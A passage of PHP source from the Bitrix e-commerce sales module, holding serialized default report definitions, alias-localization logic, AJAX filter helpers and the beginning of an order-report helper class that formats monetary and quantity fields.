's:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:6;s:9:"sort_type";s:3:"ASC";'.
's:5:"limit";N;s:12:"red_neg_vals";b:1;s:13:"grouping_mode";b:1;s:5:"chart";'.
'a:4:{s:7:"display";b:1;s:4:"type";s:3:"pie";s:8:"x_column";i:6;s:9:"y_columns";'.
'a:1:{i:0;i:10;}}s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
),
array(
'owner' => 'sale_SaleBasket',
'title' => GetMessage('SALE_REPORT_DEFAULT_CLIENTS_PROFIT__12_5'),
'description' => '',
'mark_default' => 12,
'settings' => unserialize('a:11:{s:6:"entity";s:28:"Bitrix\Sale\Internals\Basket";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:7:{i:9;a:2:{s:4:"name";'.
's:21:"FUSER.USER.SHORT_NAME";s:8:"grouping";b:1;}i:6;a:2:{s:4:"name";s:15:"NAME_WITH_IDENT";'.
's:8:"grouping";b:1;}i:7;a:4:{s:4:"name";s:8:"QUANTITY";s:5:"alias";s:10:"xxxxxxxxxx";'.
's:4:"aggr";s:3:"SUM";s:17:"grouping_subtotal";b:1;}i:5;a:4:{s:4:"name";s:13:"SUMMARY_PRICE";'.
's:5:"alias";s:16:"xxxxxxxxx xxxxxx";s:4:"aggr";s:3:"SUM";s:17:"grouping_subtotal";'.
'b:1;}i:15;a:4:{s:4:"name";s:24:"SUMMARY_PURCHASING_PRICE";s:5:"alias";s:13:"xxxxxxxxxxxxx";'.
's:4:"aggr";s:3:"SUM";s:17:"grouping_subtotal";b:1;}i:13;a:4:{s:4:"name";'.
's:12:"GROSS_PROFIT";s:5:"alias";s:15:"xxxxxxx xxxxxxx";s:4:"aggr";s:3:"SUM";'.
's:17:"grouping_subtotal";b:1;}i:14;a:4:{s:4:"name";s:13:"PROFITABILITY";'.
's:5:"alias";s:18:"xxxxxxxxxxxxxx (%)";s:4:"aggr";s:3:"AVG";s:17:"grouping_subtotal";'.
'b:1;}}s:6:"filter";a:1:{i:0;a:6:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:11:"ORDER.PAYED";s:7:"compare";s:5:"EQUAL";s:5:"value";s:4:"true";s:10:"changeable";'.
's:1:"0";}i:1;a:5:{s:4:"type";s:5:"field";s:4:"name";s:4:"NAME";s:7:"compare";'.
's:8:"CONTAINS";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:2;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:33:"PRODUCT.GoodsSection:PRODUCT.SECT";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";s:1:"1";}i:3;'.
'a:5:{s:4:"type";s:5:"field";s:4:"name";s:10:"FUSER.USER";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}i:4;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:31:"FUSER.USER.UserGroup:USER.GROUP";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:0:"";s:10:"changeable";s:1:"1";}s:5:"LOGIC";s:3:"AND";'.
'}}s:4:"sort";i:6;s:9:"sort_type";s:3:"ASC";s:5:"limit";N;s:12:"red_neg_vals";'.
'b:1;s:13:"grouping_mode";b:1;s:5:"chart";N;s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
),
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_MOB__12_5'),
'description' => '',
'mark_default' => 13,
'settings' => unserialize('a:11:{s:6:"entity";s:29:"Bitrix\Sale\Internals\Product";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:3:{i:2;a:4:{s:4:"name";'.
's:56:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.NAME";s:5:"alias";'.
's:9:"xxxxxxxxx";s:4:"aggr";s:12:"GROUP_CONCAT";s:8:"grouping";b:1;}i:8;a:2:{s:4:"name";'.
's:15:"NAME_WITH_IDENT";s:8:"grouping";b:1;}i:3;a:3:{s:4:"name";s:8:"QUANTITY";'.
's:5:"alias";s:16:"xxxxxxxx xxxxxxx";s:17:"grouping_subtotal";b:1;}}s:6:"filter";'.
'a:1:{i:0;a:3:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";s:6:"ACTIVE";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";s:4:"true";s:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";'.
's:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:8;s:9:"sort_type";s:3:"ASC";'.
's:5:"limit";N;s:12:"red_neg_vals";b:1;s:13:"grouping_mode";b:1;s:5:"chart";'.
'N;s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
),
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_PRICE_LIST_MOB__12_5'),
'description' => '',
'mark_default' => 14,
'settings' => unserialize('a:11:{s:6:"entity";s:29:"Bitrix\Sale\Internals\Product";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:3:{i:4;a:4:{s:4:"name";'.
's:56:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.NAME";s:5:"alias";'.
's:9:"xxxxxxxxx";s:4:"aggr";s:12:"GROUP_CONCAT";s:8:"grouping";b:1;}i:12;'.
'a:2:{s:4:"name";s:15:"NAME_WITH_IDENT";s:8:"grouping";b:1;}i:13;a:1:{s:4:"name";'.
's:22:"PRICE_IN_SITE_CURRENCY";}}s:6:"filter";a:1:{i:0;a:3:{i:0;a:5:{s:4:"type";'.
's:5:"field";s:4:"name";s:6:"ACTIVE";s:7:"compare";s:5:"EQUAL";s:5:"value";'.
's:4:"true";s:10:"changeable";s:1:"0";}i:1;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";s:7:"compare";'.
's:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";s:1:"1";}s:5:"LOGIC";'.
's:3:"AND";}}s:4:"sort";i:12;s:9:"sort_type";s:3:"ASC";s:5:"limit";N;s:12:"red_neg_vals";'.
'b:1;s:13:"grouping_mode";b:1;s:5:"chart";N;s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
)
),
'12.5.1' => array(
array(
'owner' => 'sale_SaleProduct',
'title' => GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_BY_STORE__12_5_1'),
'description' => '',
'mark_default' => 15,
'settings' => unserialize('a:11:{s:6:"entity";s:29:"Bitrix\Sale\Internals\Product";s:6:"period";'.
'a:2:{s:4:"type";s:5:"month";s:5:"value";N;}s:6:"select";a:7:{i:16;a:2:{s:4:"name";'.
's:37:"StoreProduct:SALE_PRODUCT.STORE.TITLE";s:8:"grouping";b:1;}i:2;a:4:{s:4:"name";'.
's:56:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.NAME";s:5:"alias";'.
's:9:"xxxxxxxxx";s:4:"aggr";s:12:"GROUP_CONCAT";s:8:"grouping";b:1;}i:8;'.
'a:2:{s:4:"name";s:15:"NAME_WITH_IDENT";s:8:"grouping";b:1;}i:25;a:3:{s:4:"name";'.
's:35:"ARRIVED_PRODUCTS_IN_PERIOD_BY_STORE";s:5:"alias";'.
's:6:"xxxxxx";s:17:"grouping_subtotal";b:1;}i:26;a:3:{s:4:"name";'.
's:35:"EXPENSE_PRODUCTS_IN_PERIOD_BY_STORE";'.
's:5:"alias";s:6:"xxxxxx";s:17:"grouping_subtotal";b:1;}i:23;a:3:{s:4:"name";'.
's:32:"StoreProduct:SALE_PRODUCT.AMOUNT";s:5:"alias";s:16:"xxxxxxxx xxxxxxx";'.
's:17:"grouping_subtotal";b:1;}i:11;a:1:{s:4:"name";s:22:"PRICE_IN_SITE_CURRENCY";'.
'}}s:6:"filter";a:1:{i:0;a:4:{i:0;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:6:"ACTIVE";s:7:"compare";s:5:"EQUAL";s:5:"value";s:4:"true";s:10:"changeable";'.
's:1:"0";}i:1;a:5:{s:4:"type";s:5:"field";s:4:"name";s:25:"StoreProduct:SALE_PRODUCT";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";'.
's:1:"1";}i:2;a:5:{s:4:"type";s:5:"field";s:4:"name";'.
's:51:"IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION";'.
's:7:"compare";s:5:"EQUAL";s:5:"value";a:1:{i:0;s:0:"";}s:10:"changeable";'.
's:1:"1";}s:5:"LOGIC";s:3:"AND";}}s:4:"sort";i:8;s:9:"sort_type";s:3:"ASC";'.
's:5:"limit";N;s:12:"red_neg_vals";b:1;s:13:"grouping_mode";b:1;s:5:"chart";'.
'N;s:6:"mobile";a:1:{s:7:"enabled";b:1;}}')
)
)
);
foreach ($reports as $version => &$vreports)
{
foreach ($vreports as $num => &$report)
{
if ($version === '12.0.0' && $report['mark_default'] === 1)
{
$report['settings']['select'][4]['alias'] = GetMessage('SALE_REPORT_DEFAULT_LEFT_BASKETS_ALIAS_4');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_LEFT_BASKETS_ALIAS_5');
$report['settings']['select'][6]['alias'] = GetMessage('SALE_REPORT_DEFAULT_LEFT_BASKETS_ALIAS_6');
$report['settings']['select'][7]['alias'] = GetMessage('SALE_REPORT_DEFAULT_LEFT_BASKETS_ALIAS_7');
}
if ($version === '12.0.0' && $report['mark_default'] === 2)
{
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT_ALIAS_3');
$report['settings']['select'][4]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT_ALIAS_4');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT_ALIAS_5');
$report['settings']['select'][6]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT_ALIAS_6');
$report['settings']['select'][14]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT_ALIAS_14');
}
if ($version === '12.0.0' && $report['mark_default'] === 3)
{
$report['settings']['select'][1]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_ALIAS_1');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_ALIAS_3');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_ALIAS_5');
}
if ($version === '12.0.0' && $report['mark_default'] === 4)
{
$report['settings']['select'][0]['alias'] = GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS_ALIAS_0');
$report['settings']['select'][2]['alias'] = GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS_ALIAS_2');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS_ALIAS_3');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS_ALIAS_5');
$report['settings']['select'][14]['alias'] = GetMessage('SALE_REPORT_DEFAULT_BEST_CLIENTS_ALIAS_14');
}
if ($version === '12.0.0' && $report['mark_default'] === 5)
{
$report['settings']['select'][0]['alias'] = GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_ALIAS_0');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_ALIAS_3');
$report['settings']['select'][4]['alias'] = GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_ALIAS_4');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_ALIAS_5');
$report['settings']['select'][6]['alias'] = GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_ALIAS_6');
$report['settings']['select'][9]['alias'] = GetMessage('SALE_REPORT_DEFAULT_NEW_CLIENTS_ALIAS_9');
}
if ($version === '12.0.0' && $report['mark_default'] === 6)
{
$report['settings']['select'][0]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_0');
$report['settings']['select'][1]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_1');
$report['settings']['select'][2]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_2');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_3');
$report['settings']['select'][4]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_4');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_5');
$report['settings']['select'][6]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_6');
$report['settings']['select'][13]['alias'] = GetMessage('SALE_REPORT_DEFAULT_SALES_ALIAS_13');
}
if ($version === '12.0.0' && $report['mark_default'] === 7)
{
$report['settings']['select'][0]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS_ALIAS_0');
$report['settings']['select'][1]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS_ALIAS_1');
$report['settings']['select'][2]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS_ALIAS_5');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS_ALIAS_8');
}
if ($version === '12.0.0' && $report['mark_default'] === 8)
{
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_VIEWED_GOODS_ALIAS_5');
$report['settings']['select'][7]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_VIEWED_GOODS_ALIAS_7');
$report['settings']['select'][8]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_VIEWED_GOODS_ALIAS_8');
$report['settings']['select'][12]['alias'] = GetMessage('SALE_REPORT_DEFAULT_MOST_VIEWED_GOODS_ALIAS_12');
}
if ($version === '12.5.0' && $report['mark_default'] === 9)
{
$report['settings']['select'][2]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES__12_5_ALIAS_2');
$report['settings']['select'][12]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES__12_5_ALIAS_12');
$report['settings']['select'][6]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES__12_5_ALIAS_6');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES__12_5_ALIAS_3');
}
if ($version === '12.5.0' && $report['mark_default'] === 10)
{
$report['settings']['select'][4]['alias'] = GetMessage('SALE_REPORT_DEFAULT_PRICE_LIST__12_5_ALIAS_4');
}
if ($version === '12.5.0' && $report['mark_default'] === 11)
{
$report['settings']['select'][7]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT__12_5_ALIAS_7');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT__12_5_ALIAS_5');
$report['settings']['select'][9]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT__12_5_ALIAS_9');
$report['settings']['select'][10]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT__12_5_ALIAS_10');
$report['settings']['select'][11]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_PROFIT__12_5_ALIAS_11');
}
if ($version === '12.5.0' && $report['mark_default'] === 12)
{
$report['settings']['select'][7]['alias'] = GetMessage('SALE_REPORT_DEFAULT_CLIENTS_PROFIT__12_5_ALIAS_7');
$report['settings']['select'][5]['alias'] = GetMessage('SALE_REPORT_DEFAULT_CLIENTS_PROFIT__12_5_ALIAS_5');
$report['settings']['select'][15]['alias'] = GetMessage('SALE_REPORT_DEFAULT_CLIENTS_PROFIT__12_5_ALIAS_15');
$report['settings']['select'][13]['alias'] = GetMessage('SALE_REPORT_DEFAULT_CLIENTS_PROFIT__12_5_ALIAS_13');
$report['settings']['select'][14]['alias'] = GetMessage('SALE_REPORT_DEFAULT_CLIENTS_PROFIT__12_5_ALIAS_14');
}
if ($version === '12.5.0' && $report['mark_default'] === 13)
{
$report['settings']['select'][2]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_MOB__12_5_ALIAS_2');
$report['settings']['select'][3]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_MOB__12_5_ALIAS_3');
}
if ($version === '12.5.0' && $report['mark_default'] === 14)
{
$report['settings']['select'][4]['alias'] = GetMessage('SALE_REPORT_DEFAULT_PRICE_LIST__12_5_ALIAS_4');
}
if ($version === '12.5.1' && $report['mark_default'] === 15)
{
$report['settings']['select'][2]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_BY_STORE__12_5_1_ALIAS_2');
$report['settings']['select'][23]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_BY_STORE__12_5_1_ALIAS_23');
$report['settings']['select'][25]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_BY_STORE__12_5_1_ALIAS_25');
$report['settings']['select'][26]['alias'] = GetMessage('SALE_REPORT_DEFAULT_GOODS_INVENTORIES_BY_STORE__12_5_1_ALIAS_26');
}
// remove reports, which not work in MSSQL
global $DBType;
if (ToUpper($DBType) === 'MSSQL')
{
if (
($version === '12.0.0' && in_array($report['mark_default'], array(4, 5, 6, 7, 11, 12)))
||
($version === '12.5.0' && in_array($report['mark_default'], array(11, 12)))
)
{
unset($vreports[$num]);
}
}
// remove old reports
if (
(ToUpper($DBType) !== 'MSSQL' && $version === '12.0.0' && in_array($report['mark_default'], array(2, 3)))
||
(ToUpper($DBType) === 'MSSQL' && $version === '12.0.0' && in_array($report['mark_default'], array(3)))
)
{
unset($vreports[$num]);
}
}
}
return $reports;
}
public static function getCurrentVersion()
{
$arModuleVersion = array();
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/sale/install/version.php");
return $arModuleVersion['VERSION'];
}
public static function getFirstVersion()
{
return '12.0.0';
}
public static function getAjaxResponse($arRequestData)
{
$siteId = self::getDefaultSiteId();
$arResponseData = array();
$arbFilterTypeFill = array();
foreach (array_unique($arRequestData) as $filterType)
{
if (empty($arbFilterTypeFill[$filterType]))
{
switch ($filterType)
{
case 'PersonType':
$arResponseData[$filterType][] = array(
'value' => '',
'text' => GetMessage('REPORT_IGNORE_FILTER_VALUE')
);
foreach(self::getPersonTypes() as $kID => $v)
{
if ($v['LID'] === $siteId)
{
$arResponseData[$filterType][] = array('value' => $kID, 'text' => $v['NAME']);
}
}
break;
case 'PaySystem':
$arResponseData[$filterType][] = array(
'value' => '',
'text' => GetMessage('REPORT_IGNORE_FILTER_VALUE')
);
foreach(self::getPaySystemList() as $kID => $val)
{
if ($val['site_id'] === '' || $val['site_id'] === $siteId)
{
$arResponseData[$filterType][] = array('value' => $kID, 'text' => $val['value']);
}
}
break;
case 'Delivery':
$arResponseData[$filterType][] = array(
'value' => '',
'text' => GetMessage('REPORT_IGNORE_FILTER_VALUE')
);
foreach(self::getDeliveryList() as $kID => $val)
{
if ($val['site_id'] === '' || $val['site_id'] === $siteId)
{
$arResponseData[$filterType][] = array('value' => $kID, 'text' => $val['value']);
}
}
break;
case 'Section':
$arResponseData[$filterType][] = array(
'value' => '',
'text' => GetMessage('REPORT_IGNORE_FILTER_VALUE')
);
$prevCatalog = -1;
foreach(self::getCatalogSections() as $kSectionID => $vSection)
{
if (self::isCatalogCorrespondsDefSite($vSection['catalog']['ID']))
{
// Inserting catalogs headers in list of sections of goods.
if ($vSection['catalog']['ID'] != $prevCatalog)
{
$arResponseData[$filterType][] = array(
'value' => 'c'.$vSection['catalog']['ID'],
'text' => '- '.GetMessage('SALE_REPORT_CONSTRUCT_CATALOG_NAME_LABEL').
': '.$vSection['catalog']['NAME']
);
}
$prevCatalog = $vSection['catalog']['ID'];
$arResponseData[$filterType][] = array('value' => $kSectionID, 'text' => ' '.$vSection['name']);
}
}
break;
}
}
$arbFilterTypeFill[$filterType] = true;
}
return $arResponseData;
}
public static function getSectionsSelectHTMLOptions()
{
$html = '';
$prevCatalog = -1;
$html .= '<option value="">'.GetMessage('REPORT_IGNORE_FILTER_VALUE').'</option>';
foreach(self::getCatalogSections() as $kSectionID => $vSection)
{
if (self::isCatalogCorrespondsDefSite($vSection['catalog']['ID']))
{
// Inserting catalogs headers in list of sections of goods.
if ($vSection['catalog']['ID'] != $prevCatalog)
{
$html .= '<option value="c'.htmlspecialcharsbx($vSection['catalog']['ID']).'">- '.GetMessage('SALE_REPORT_CONSTRUCT_CATALOG_NAME_LABEL').
': '.htmlspecialcharsbx($vSection['catalog']['NAME']).'</option>';
}
$prevCatalog = $vSection['catalog']['ID'];
$html .= '<option value="'.htmlspecialcharsbx($kSectionID).'"> '.htmlspecialcharsbx($vSection['name']).'</option>';
}
}
return $html;
}
public static function calculateInReportCurrency($value)
{
$res = $value;
if (self::$reportCurrencyId != self::$siteCurrencyId)
{
$res = \CCurrencyRates::ConvertCurrency($value, self::$siteCurrencyId, self::$reportCurrencyId);
}
return $res;
}
}
class CSaleReportSaleOrderHelper extends CBaseSaleReportHelper
{
private static $monetaryFields = array(
'TAX_VALUE',
'PRICE_DELIVERY',
'DISCOUNT_ALL',
'PRICE',
'SUM_PAID_FORREP',
'PAYMENT_ORDER_SUM'
);
private static $goodsQuantityFields = array(
'PRODUCTS_QUANT'
);
private static $withoutTotalFields = array(
'PERSON_TYPE_ID'
);
private static $userNotAuthNameFields = array();
public static function getEntityName()
{
return 'Bitrix\Sale\Internals\Order';
}
public static function getOwnerId()
{
return SALE_REPORT_OWNER_ID.'_SaleOrder';
}
public static function getColumnList()
{
IncludeModuleLangFile(__FILE__);
return array(
'ID',
'DATE_INSERT_SHORT',
'DATE_UPDATE_SHORT',
'STATUS' => array(
'STATUS_ID',
'NAME',
'DESCRIPTION'
),
'EMP_STATUS_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_STATUS_SHORT',
'PRICE_DELIVERY',
'PAYED',
'SUM_PAID_FORREP',
'Payment:ORDER' => array(
'ID',
'DATE_BILL',
'DATE_PAY_BEFORE',
'DATE_PAID',
'EMP_PAID_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'PAY_VOUCHER_NUM',
'PAY_VOUCHER_DATE',
'PAY_SYSTEM_ID',
'PAY_SYSTEM_NAME',
'PAY_RETURN_NUM',
'PAY_RETURN_DATE',
'SUM',
'CURRENCY',
'RESPONSIBLE_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
)
),
'DEDUCTED',
'Shipment:REPS_ORDER' => array(
'ID',
'ALLOW_DELIVERY',
'DELIVERY_ID',
'DELIVERY_NAME',
'EMP_ALLOW_DELIVERY_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_ALLOW_DELIVERY_SHORT',
'DELIVERY_DOC_NUM',
'DELIVERY_DOC_DATE_SHORT',
'DEDUCTED',
'EMP_DEDUCTED_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_DEDUCTED_SHORT',
'RESERVED',
'TRACKING_NUMBER',
'PRICE_DELIVERY',
'CURRENCY',
'RESPONSIBLE_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
)
),
'CANCELED',
'EMP_CANCELED_BY' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE'
),
'DATE_CANCELED_SHORT',
'REASON_CANCELED',
'PRODUCTS_QUANT',
'TAX_VALUE',
'PRICE',
'DISCOUNT_ALL',
/*'LID',*/
'PERSON_TYPE_ID',
'USER' => array(
'ID',
'NAME',
'LAST_NAME',
'SHORT_NAME',
'EMAIL',
'PERSONAL_PHONE',
'DATE_REG_SHORT',
'UserGroup:USER.GROUP' => array(
'ID',
'NAME'
)
)
);
}
public static function getDefaultColumns()
{
return array(
array('name' => 'ID'),
array('name' => 'DATE_INSERT_SHORT')
);
}
public static function getCalcVariations()
{
return array_merge(parent::getCalcVariations(), array(
'date' => array(
'MIN',
'MAX',
'COUNT_DISTINCT'
),
'USER.UserGroup:USER.GROUP.ID' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'USER.UserGroup:USER.GROUP.NAME' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
)
));
}
public static function getCompareVariations()
{
return array_merge(parent::getCompareVariations(), array(
'date' => array(
'EQUAL',
'GREATER_OR_EQUAL',
'GREATER',
'LESS',
'LESS_OR_EQUAL',
'NOT_EQUAL'
),
'LID' => array(
'EQUAL',
'NOT_EQUAL'
),
'PERSON_TYPE_ID' => array(
'EQUAL',
'NOT_EQUAL'
),
'STATUS' => array(
'EQUAL',
'NOT_EQUAL'
),
'USER.UserGroup:USER.GROUP' => array(
'EQUAL',
'NOT_EQUAL'
),
'\Bitrix\Main\User' => array(
'EQUAL'
),
'\Bitrix\Main\Group' => array(
'EQUAL'
)
));
}
public static function getPeriodFilter($date_from, $date_to)
{
global $DB;
$filter = array('LOGIC' => 'AND');
if(!is_null($date_to))
{
$filter[] = array(
'LOGIC' => 'OR',
'<=DATE_INSERT_SHORT' => $date_to,
'=DATE_INSERT_SHORT' => null
);
}
if(!is_null($date_from))
{
$filter[] = array(
'LOGIC' => 'OR',
'>=DATE_INSERT_SHORT' => $date_from,
'=DATE_INSERT_SHORT' => null
);
}
// Site filter
$filter[] = array(
'=LID' => $DB->ForSql(self::getDefaultSiteId())
);
return $filter;
}
public static function fillFilterReferenceColumn(&$filterElement, Entity\ReferenceField $field)
{
if ($field->getRefEntityName() == '\Bitrix\Main\User')
{
// USER
if ($filterElement['value'])
{
$res = CUser::GetByID($filterElement['value']);
$user = $res->fetch();
if ($user)
{
$username = CUser::FormatName(CSite::GetNameFormat(null, self::getDefaultSiteId()), $user, true, false);
$filterElement['value'] = array('id' => $user['ID'], 'name' => $username);
}
else
{
$filterElement['value'] = array('id' => $filterElement['value'], 'name' => GetMessage('REPORT_USER_NOT_FOUND'));
}
}
else
{
$filterElement['value'] = array('id' => '');
}
}
else if ($field->getRefEntityName() == '\Bitrix\Main\Group')
{
// GROUP
if ($filterElement['value'])
{
$res = CGroup::GetByID($filterElement['value']);
$group = $res->fetch();
if ($group)
{
$filterElement['value'] = array('id' => $group['ID'], 'name' => $group['NAME']);
}
else
{
$filterElement['value'] = array('id' => $filterElement['value'], 'name' => GetMessage('SALE_REPORT_GROUP_NOT_FOUND'));
}
}
else
{
$filterElement['value'] = array('id' => '');
}
}
}
/* remove it when PHP 5.3 available */
public static function formatResults(&$rows, &$columnInfo, $total)
{
foreach ($rows as &$row)
{
foreach ($row as $k => &$v)
{
if (!array_key_exists($k, $columnInfo))
{
continue;
}
$cInfo = &$columnInfo[$k];
if (is_array($v))
{
foreach ($v as &$subv)
{
self::formatResultValue($k, $subv, $row, $cInfo, $total);
}
}
else
{
self::formatResultValue($k, $v, $row, $cInfo, $total);
}
}
}
unset($row, $v, $subv);
}
/* \remove it */
public static function formatResultValue($k, &$v, &$row, &$cInfo, $total, &$customChartValue = null)
{
$dataType = self::getFieldDataType($cInfo['field']);
/** @var Bitrix\Main\Entity\Field[] $cInfo */
if ($dataType !== 'float' ) // skip base rounding
{
parent::formatResultValue($k, $v, $row, $cInfo, $total);
}
if ($k === 'PERSON_TYPE_ID')
{
$v = self::$personTypes[$v]['NAME'];
}
else if ($k === 'LID')
{
$v = self::$sitelist[$v];
}
// Removing the link from the email field if is empty.
else if ($k === 'SALE_ORDER_USER_EMAIL')
{
if (is_null($v) || empty($v) || $v == ' ') unset($row['__HREF_'.$k]);
}
// Inserting zero in numerical fields with null value.
if (empty($v))
{
if (in_array($dataType, array('integer', 'float')))
{
$v = 0;
}
//else $v = ' ';
}
if (empty($cInfo['aggr']))
{
if (($cInfo['field']->getEntity()->getName() === 'Shipment'
&& in_array($cInfo['field']->getName(), array('ID', 'DELIVERY_ID', 'DELIVERY_NAME'), true))
|| ($cInfo['field']->getEntity()->getName() === 'Payment'
&& in_array($cInfo['field']->getName(), array('ID', 'PAY_SYSTEM_ID', 'PAY_SYSTEM_NAME'), true)))
{
if (is_null($v) || empty($v) || $v == ' ')
{
unset($row['__HREF_'.$k]);
}
}
}
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
$v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
